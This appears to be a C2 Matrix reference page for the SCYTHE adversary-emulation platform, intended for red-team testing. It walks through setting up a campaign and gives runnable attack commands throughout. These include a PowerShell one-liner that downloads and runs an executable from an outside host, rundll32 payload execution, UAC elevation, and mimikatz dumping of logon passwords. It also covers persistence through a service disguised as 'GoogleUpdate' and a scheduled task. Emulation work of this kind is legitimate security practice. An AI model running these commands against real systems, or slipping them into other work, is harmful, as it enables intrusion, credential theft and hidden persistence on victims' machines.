C2 Matrix
Search…
SCYTHE

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is default,
    • DNS, HTTP, and Stego require relays to be installed on redirector
    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:
1
rundll32.exe ServiceLogin.dll,PlatformClientMain
Copied!

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:
1
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
Copied!

Emulate TTPs

1
loader --load run
2
run whoami
3
run cmd /c whoami
Copied!

Load Python Runtime

1
loader --load-runtime python3
2
list modules
3
loader --load "modulename"
4
"modulename"
Copied!

Download files

Move file to virtual file system
1
loader --load downloader
2
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll
Copied!

Privilege Escalation (TA0004)

UAC (T1088)

1
loader --load elevate
2
elevate --prompt
Copied!

Credential Access (TA0006)

Credential Dumping (T1003)

1
loader --load mimikatz
2
mimikatz --arglist privilege::debug
3
mimikatz --arglist sekurlsa::logonPasswords
Copied!

Persistence (TA0003)

New Service (T1050)

1
loader --load persist
2
3
Synatax:
4
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
5
6
Example:
7
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe
Copied!

Scheduled Task (T1168)

1
schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
Copied!

Clean up

Persistence:

1
run sc delete GoogleUpdate
2
run del C:\Windows\Temp\GoogleUpdate.exe
Copied!

Kill agent:

1
controller --shutdown
Copied!
Last modified 1yr ago